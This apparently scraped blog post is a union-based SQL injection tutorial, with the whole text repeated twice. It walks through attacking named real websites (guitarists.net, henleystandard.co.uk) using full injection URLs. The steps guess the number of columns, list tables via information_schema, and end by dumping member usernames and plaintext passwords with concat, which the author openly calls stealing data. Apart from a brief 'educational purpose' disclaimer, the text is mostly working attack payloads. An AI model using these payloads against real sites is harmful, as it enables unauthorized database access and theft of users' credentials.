sql injection tutorial with examples
SQL INJECTION:
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user
input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
Imagine that you found this site:
http://www.guitarists.net/
Now 1st of all we need to Find the url like this to test sql injection.
id=xyz
Okay suppose we are going with this url
http://www.guitarists.net/links/list.php?id=253
To test the file that has the variable list.php id badly planned, and if we fit in a simple, 'and give us an error identical to that
http://www.guitarists.net/links/list.php?id=253
'
Error:
Quote:
Fatal error: Call to undefined method DB_Error::numRows() in /home/gnet/public_html/links/list.php on line 57
Now we will explore it.
The First Step of all, and find out how many columns have, as we get the correct column, we'll see something different
Code:
Code:
-1+union+select+
This is the basic syntax for this example of attack, but of course you can be
done differently, but I find this easier to start.
Keep Adding Numbers to guess the Correct colunms like this
http://www.guitarists.net/links/list.php?id=-1+union+select+0-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3,4-- [(:]
Beat the SQL error here, here and found that the web, has 4 columns!
Also appears to us the number 1, that is, we know that the column 1 are vulnerable, and it is through them that we are going for a steal information
So now we know, we have 4 columns and column 1 is vulnerable, we will use.
Information_Schema.Tables
table_name & information_schema.tables--
It helps us to Find the table names. Now our Link Would be Like This
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--
Replacing the vulnerable column 1 in the string table_name.
Note: Here you can see all table, but not always that happens in certain websites, so we can see one by one, and for this you use the term +limit+*,1--
Like:
http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10+from+information_schema.tables+limit+0,1--
...
Well continuing with our web ...
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--
As we can see there are a lot of tables, but have doubt, is the table members! because we have to stole data from members. admin, administrators etc.
As we can see there is no table like Administrator or admin so now we will try to Explore members and check it What info it has
Now we need to see the columns that the table has for so we used the syntax.
column_name &
information_schema.columns
And our url will be like this.
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--
Don't confuse going to Explain it now :-j
+where ---> Where?
+table_name= ---> Name of Table?
char() ---> Name of Table in ASCII
e.g:
Code:
Code:
m = 109
e = 101
m = 109
b = 98
e = 101
r = 114
s = 115
Google it "Table in ASCII" you will get the whole table.
Well, now let's find out what we see in
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--
w0w we succeeded to grab the required info.
Cheers!!
Well, what interests us and the column
Login and password that it is ..
Well, now we make the final injection, the data to steal login and password
The injection is made of the following way ..
To see Login:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strUsername,2,3,4+from+members--
To see Passwords:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strPassword,2,3,4+from+members--
There is a much simpler method, which is to see everything
at the same time using the syntax.
concat( )
well, concat serves to unite all at once, then our url would be like this:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,concat(strUsername,0x3a,strPassword),2,3,4+from+members--
Quote
0x3a -> Hexadecimal code, used to insert : between one and another, not to be confused
All Passwords are in text-plain not in hash!
Hope this tutorial helps you to learn sql injection. And to understand different techniques related to sql injection.
This Tutorial is Written for Educational purpose, I am not responsible if anyone use it for illegal purpose.
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user
input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
Imagine that you found this site:
http://www.guitarists.net/
Now 1st of all we need to Find the url like this to test sql injection.
id=xyz
Okay suppose we are going with this url
http://www.guitarists.net/links/list.php?id=253
To test the file that has the variable list.php id badly planned, and if we fit in a simple, 'and give us an error identical to that
http://www.guitarists.net/links/list.php?id=253
'
Error:
Quote:
Fatal error: Call to undefined method DB_Error::numRows() in /home/gnet/public_html/links/list.php on line 57
Now we will explore it.
The First Step of all, and find out how many columns have, as we get the correct column, we'll see something different
Code:
Code:
-1+union+select+
This is the basic syntax for this example of attack, but of course you can be
done differently, but I find this easier to start.
Keep Adding Numbers to guess the Correct colunms like this
http://www.guitarists.net/links/list.php?id=-1+union+select+0-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3,4-- [(:]
Beat the SQL error here, here and found that the web, has 4 columns!
Also appears to us the number 1, that is, we know that the column 1 are vulnerable, and it is through them that we are going for a steal information
So now we know, we have 4 columns and column 1 is vulnerable, we will use.
Information_Schema.Tables
table_name & information_schema.tables--
It helps us to Find the table names. Now our Link Would be Like This
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--
Replacing the vulnerable column 1 in the string table_name.
Note: Here you can see all table, but not always that happens in certain websites, so we can see one by one, and for this you use the term +limit+*,1--
Like:
http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10+from+information_schema.tables+limit+0,1--
...
Well continuing with our web ...
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--
As we can see there are a lot of tables, but have doubt, is the table members! because we have to stole data from members. admin, administrators etc.
As we can see there is no table like Administrator or admin so now we will try to Explore members and check it What info it has
Now we need to see the columns that the table has for so we used the syntax.
column_name &
information_schema.columns
And our url will be like this.
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--
Don't confuse going to Explain it now :-j
+where ---> Where?
+table_name= ---> Name of Table?
char() ---> Name of Table in ASCII
e.g:
Code:
Code:
m = 109
e = 101
m = 109
b = 98
e = 101
r = 114
s = 115
Google it "Table in ASCII" you will get the whole table.
Well, now let's find out what we see in
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--
w0w we succeeded to grab the required info.
Cheers!!
Well, what interests us and the column
Login and password that it is ..
Well, now we make the final injection, the data to steal login and password
The injection is made of the following way ..
To see Login:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strUsername,2,3,4+from+members--
To see Passwords:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strPassword,2,3,4+from+members--
There is a much simpler method, which is to see everything
at the same time using the syntax.
concat( )
well, concat serves to unite all at once, then our url would be like this:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,concat(strUsername,0x3a,strPassword),2,3,4+from+members--
Quote
0x3a -> Hexadecimal code, used to insert : between one and another, not to be confused
All Passwords are in text-plain not in hash!
Hope this tutorial helps you to learn sql injection. And to understand different techniques related to sql injection.
This Tutorial is Written for Educational purpose, I am not responsible if anyone use it for illegal purpose.
No comments:
Post a Comment